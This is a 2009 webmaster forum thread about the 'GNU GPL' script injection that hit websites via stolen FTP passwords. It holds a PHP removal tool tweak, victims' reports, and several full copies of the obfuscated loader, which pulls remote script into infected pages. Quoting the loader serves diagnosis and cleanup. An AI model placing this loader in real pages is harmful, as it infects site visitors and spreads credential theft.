Recent Threads

Metadata

May 25
What is White Hat SEO?

May 25Dexterjhonson
Penguin 2.0 rolled out today...!!

May 25prashant kumar
Testing Alexa

May 25kasmandapalace
ERP in India

May 25kasmandapalace
Want UK based Bookmarking sites????

May 25ContentWritings
Require Link Builder for German sites

May 25ContentWritings
What is the latest link building technique?

May 24tarekitsme
how can i find our competitor backlink

May 24chiefson
Which is the best social networking site?

May 24chiefson
More…

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Forums

Gold Sponsor

Silver Sponsors

/GNU GPL/ try{window.onload = function(){var

MOGmartin Registered Users, 500 Post Club

December 2009 in On Site Optimization

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

HERE IS HOW TO FIX IT IN 4 EASY STEPS
(UPDATED AGAIN 12th January - this script has been downloaded over 7,500 times!)

1) Download this file: Cure GNU GPL Virus File (Curevir.php)
2) Extract the file contained in it, its called: curevir.php
3) Upload that file to the ROOT DIRECTORY of your website
4) Go to: http://YOURWEBSITENAME.COM/curevir.php

Thats it, it will take a seconds to a few minutes depending on how large your website is, it scans every file that could be infected, backs it up first, then removes the virus if it finds it.
Once its done its thing, and you are happy that the virus is gone, then you can delete your backups.

IMPORTANT - you must now change all your ftp passwords, they have been compromised, and your website will be re-infected unless you do this immediately.
If you find this tool useful, PLEASE link to us!

EXAMPLE OF THE FULL CODE:

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 
'myscript1');X08yhffhg7xkxf.setAttribute('src',  'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8&#0$8^!!0#@$/@^#n^$o#&!v@!!
i@#@n)k))y!(#.@$c&#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!
n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^
#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer', 
'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>

It attacks any webpage that it finds on your server that meet the following criteria:

filename =
index*
default*
*.js

Flag 0 • Off Topic Disagree Agree Like •

Posts

MOGmartin Registered Users, 500 Post Club

December 2009
UPDATE

Just found a new version, it looks like this: the original script should still solve the problem though....

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type',
'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)
n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^!8�$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&#(^#z)@
#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&
#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|$|\^/ig, ''));X08yhffhg7xkxf.setAttribute
('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute
('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)
t($r&a)$)v$i)a)@)n&-$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o
)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^!8�$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&
#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d
(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|$|@|#|$|\^/ig, '')
);X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script><script>/*GNU GPL*
/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript')
;X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-$@@
(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)
j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^!8�$8^!!0#@$/@^#n^$o#&!v@!!i@#@n)k))y!(#.@$c&#
(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p
)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|$|@|#|\(|\^/ig, ''));
X08yhffhg7xkxf.setAttribute('defer', 'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
armantine Registered Users

December 2009
Bonjour,
Sorry for my english but i'm french.
I was infected bu this code and i applied your code.
I think, some js files still inifected, i'll resolve later.
I have a question, i see when i refresh a page, a link in the footer of the browser but it's too quickly, i don' find the link on my apache log.
Have you got an idea ?
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
MOGmartin Registered Users, 500 Post Club

December 2009
no problems about your english!! its better than my French!

Anyway, Im not sure what the link is that you mean, do you have a screenshot that I can look at?

thanks!

MOGmartin
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
valene Registered Users

December 2009
MOGmartin wrote: »

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&- $@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!- )$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8[code]<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id',
'myscript1');X08yhffhg7xkxf.setAttribute('src', 'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^!8
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
scraggz Registered Users

December 2009
MOGmartin wrote: »

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

MOGmartin

Thanks for this. Every one of my domains got hit with it. I had found the ones in the index* and default* files but didn't know about the *.js.

The tool you recommended fixed them all up in no time. Lifesaver!

Will link to you for sure!

Cheers

Stan
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
charles Registered Users

December 2009
Thanks for the script, it was a great start. Unfortunately it does not work well on a site that has thousands of files. The script is very memory intensive and slow because it is reading the full file into memory and then doing a full text search on the file in memory.

We should avoid this, and leverage shell commands to make things faster and less memory intensive.

I made the following enhancement to the check_file() function that you might consider including in your script:

/* START check_file function */

function check_file($file){

global $count;

$ptrn = "/(php|html|shtml|htm|js|tpl|inc)$/";

$virus_string = '/*GNU GPL*/ try{window.onload = function(){var';

if (preg_match($ptrn, $file)) {
//run a shell command to grep files instead of loading into memory
$execoutput = exec("fgrep -l '{$virus_string}' ".escapeshellarg($file));//EDIT added escapeshellarg()

if($execoutput){
//echo a little output so we see progress
//echo $execoutput.' ';
$count++;
return $file;
}

/************************
*************************
//commented out this section, no more full file in memory
$contents = file_get_contents($file);

if (strpos ($contents, $virus_string) !== false && $file != 'curevir.php' ){
//pa($file.'/'.$file);
if ($count == 0) {
//chmod($file, 0777);

}

//pa($file);

$count++;

return $file;

}
******************/

}

return false;

}

/* END check_file function */

This modification took the script from trying to consume over 1 Gig of RAM and 20+ minutes to quick response (3-4 mins) and negligible memory / CPU usage.

charles
www.forthecode.org
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
charles Registered Users

December 2009
In my example, you may need to add back the code to prevent the script from detecting itself
Again, thanks for posting your script!
charles
www.forthecode.org
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
MOGmartin Registered Users, 500 Post Club

December 2009
Ive got a fix for these issues, thanks for posting them by the way - I will upload the new script today,

cheers!

MOGmartin
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
mbaum Registered Users

December 2009
Hi guys,

the files on my webspace were also affected by this virus.
thanks to my webhoster who had a backup, the damage caused was not that bad.

but now I have a question to you: how did they get onto my FTP-Server?
I have checked all available logfiles for that day, their first login was at 8pm, the action took about 4,5 hours!

Is it, as mentioned in the entry post, a problem affecting the unix servers, or is it possible they found out our FTP access data? Anyway, we changed all used passwords. How did they get into your files?

thank you all,
kind regards from Germany!
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
MOGmartin Registered Users, 500 Post Club

December 2009
mbaum wrote: »

Hi guys,

the files on my webspace were also affected by this virus.
thanks to my webhoster who had a backup, the damage caused was not that bad.

but now I have a question to you: how did they get onto my FTP-Server?
I have checked all available logfiles for that day, their first login was at 8pm, the action took about 4,5 hours!

Is it, as mentioned in the entry post, a problem affecting the unix servers, or is it possible they found out our FTP access data? Anyway, we changed all used passwords. How did they get into your files?

thank you all,
kind regards from Germany!

The virus arrives on your machine after visiting an infected webpage, it scans for any common ftp program installed, then harvests any saved passwords and uploads them to their server in china.

once they have your passwords they begin infecting your sites as well.

so, once your sites have been infected, you 100% know that all your saved ftp passwords have also been comprimised.

scary!
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
Hitbyvirus Registered Users

December 2009
I was hit hard, it was my computer and my servers. I'm not convinced about the harvesting thing because all the sites that were hit were on my saved password list for ftp (not a good idea , save the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

I'm not discounting the uploading password theory but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate log in and IP even on the same site).

It also did something else. It set up a SMTP engine on my computer and sent so many e-mails my ISP blocked port 25 on my account.

It also couldn't be deleted. Not Avast, malware bytes (even after running rkill.bat like for vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

I couldn't get the script posted here to work properly as root, as native user, with any permissions I tried.

BTW it also hits files that start with the word "main".
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
SergST Registered Users

December 2009
MOGmartin wrote: »

MOGmartin

Hi.
I have a problem. This script, is started only from a folder with the rights 755. It is necessary to start it for example from a folder /forum/remove_virus.php, but that scanning would begin from ROOT.
Help.
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
MOGmartin Registered Users, 500 Post Club

December 2009
Hitbyvirus wrote: »

I was hit hard, it was my computer and my servers. I'm not convinced about the harvesting thing because all the sites that were hit were on my saved password list for ftp (not a good idea , save the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

I'm not discounting the uploading password theory but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate log in and IP even on the same site).

It also did something else. It set up a SMTP engine on my computer and sent so many e-mails my ISP blocked port 25 on my account.

It also couldn't be deleted. Not Avast, malware bytes (even after running rkill.bat like for vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

I couldn't get the script posted here to work properly as root, as native user, with any permissions I tried.

BTW it also hits files that start with the word "main".

Thanks for the post, its interesting to see the behaviour that you have encountered, I wonder if its a slightly different version to the one that I received...

My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

I dont have any logs of ftp sessions from my network for that time period though, or at least none that I know of, I will have to check that out.

Also, Im behind a serious strength office firewall, so port 25 is blocked from my machine anyway.

finally, thanks for posting mate, your input is much appreciated!

MOGmartin
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
MOGmartin Registered Users, 500 Post Club

December 2009
SergST wrote: »

Hi.
I have a problem. This script, is started only from a folder with the rights 755. It is necessary to start it for example from a folder /forum/remove_virus.php, but that scanning would begin from ROOT.
Help.

Hi SergST - the script can only recurse subdirectories Im afraid, so please place it as far down the directory tree that you possibly can on your site.

thanks

MOGmartin
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
Hitbyvirus Registered Users

December 2009
MOGmartin wrote: »

Thanks for the post, its interesting to see the behaviour that you have encountered, I wonder if its a slightly different version to the one that I received...

My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

I dont have any logs of ftp sessions from my network for that time period though, or at least none that I know of, I will have to check that out.

Also, Im behind a serious strength office firewall, so port 25 is blocked from my machine anyway.

finally, thanks for posting mate, your input is much appreciated!

MOGmartin

Happy to be here .

Been reading on Gumblar and every article I read points toward that being the root. Or a variant. I simply went to a site to attempt to book a hotel for a night.

So far on my servers here is the hit list:

Any file that starts with index and ends in .php, .htm, .html (index_90210.htm would qualify)
Any file that starts with default and ends in the extensions above.
Any file that starts with main and ends with the extensions above.
Any file ending in .js

If anyone knows of more please post it here.
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
SergST Registered Users

December 2009
MOGmartin wrote: »

Hi SergST - the script can only recurse subdirectories Im afraid, so please place it as far down the directory tree that you possibly can on your site.

thanks

MOGmartin

Hello!
ок and how me to scan folders having CMOD 777? I know precisely, there there is in files this script-virus. Start from such folders a remove_virus.php I can not.

Sorry my english!
Thanks.

Tree site:

|
public_html (777)
| -remove_virus.php(is not work)
index.php
|
system(777)--remove_virus.php(is not work)
| -application(777) (virus!!!)
| -cache(755)
| -database(755) (virus!!!)
| -libraries(755) (virus!!!)
| -.....
forum(755)-remove_virus.php(is work, but scan folder forum and under folder forum)
| -...
|
...
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
nevetsnikam Registered Users

December 2009
MOGmartin wrote: »

THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:

<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
mbauer Registered Users

December 2009
I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

Thank you!
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
MOGmartin Registered Users, 500 Post Club

December 2009
mbauer wrote: »

I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

Thank you!

you need to firstly, change all your ftp passwords.

Then run a spyware sweep using avast software, someone sent me a PM this morning to let me know that this antivirus NOW finds the infected files.
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
webster Registered Users

December 2009
Hello,

I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

<script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.





The curevir.php will not work with the additional lines:


curevir finds the infection but it doesn't delete the lines...

Please help.

THX
WEBSTER
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
slavvek Registered Users

December 2009
webster wrote: »

Hello,

I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

<script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.





The curevir.php will not work with the additional lines:


curevir finds the infection but it doesn't delete the lines...

Please help.

THX
WEBSTER

I have the same problem and i can`t download file

Could not read source file

Please help

Best regards
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
AJ~ Registered Users

December 2009
webster wrote: »

Hello,

I was also hacked today. But I can't fix the problem, cause my Code was modified like this:

<script>/*GNU GPL*/ try{window.onload = function(){var blablabla ect.





The curevir.php will not work with the additional lines:


curevir finds the infection but it doesn't delete the lines...

Please help.

THX
WEBSTER

I'm also having this problem. I have similar lines in my infected files after the <script> and it says success when I run curevir.php but sadly nothing is removed.

Any ideas on how to resolve this?

Many thanks,

AJ
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
aingham Registered Users

December 2009
I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

I noticed that in a small number of cases it says it has succeeded in curing file, but if I re-run immediately, they appear again. Not a problem, as I've removed manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

<script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|$|\!|$|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|$|\!|$/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/$|\^|@|$|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|$|$|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>



Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
litensweet Registered Users

December 2009
I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:

<script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then






I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded and while i can see SOME of the site, i can't log in as an admin and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

Please help???

LNS
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
kambodianboi Registered Users

December 2009
I have made some changes to the script, basically commenting out the backing up part, so I can cron the script to run 5 times a day, just incase the virus decide to comes back. I notify my host and they said its cause of my faulty scripts, lol.

I suggest everyone cron the script in the main directory, just as a security measure too.
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
aingham Registered Users

December 2009
I notice that this problem is also mentioned in some Wordpress threads, e.g. http://wordpress.org/support/topic/344181
Is it possible that this attack is using Wordpress to get in there?
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
kboyko Registered Users

December 2009
litensweet wrote: »

I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:

<script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then






I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded and while i can see SOME of the site, i can't log in as an admin and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

Please help???

LNS

I've posted the update on the script at http://justcoded.com/article/gumblar-family-virus-removal-tool/, you can download new version there.

Konstantin Boyko,
http://justcoded.com
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
kboyko Registered Users

December 2009
I think you still have the virus, you need to make sure that your machine is clean before changing the password. The other measure is to not save your password in FileZilla - it is known as the client where passwords can be stolen. From my experience WinSCP is safe for now.

Regards,
Konstantin Boyko
http://justcoded.com

aingham wrote: »

I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

I noticed that in a small number of cases it says it has succeeded in curing file, but if I re-run immediately, they appear again. Not a problem, as I've removed manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

<script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|$|\!|$|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|$|\!|$/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/$|\^|@|$|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|$|$|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>



Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
slavvek Registered Users

December 2009
Thank`s for script
but I have still problem.
My index.php amd other files are clean but still when I go to my web I see only white site

Sory for my English

Please help
Best regards
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •
kma9000 Registered Users

December 2009
I just wanted to register and say thankyou for this great script. I was infected by this virus on several domains but after uploading the curevir.php script and running it in each directory it would appear to have cleared it completely.

For future reference, the virus attempts to load things onto the hosts computer, I noticed this message:

This web site wants to run the following add-on: 'Microsoft Data
Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If
you trust the web site and the add-on and want to allow it to run,
click here...

I was also receiving a warning message similar to this:

http://img199.imageshack.us/img199/4237/warninga.jpg
Flag
Spam
Abuse
Troll
0 • Off Topic Disagree Agree Like •

or Register to comment.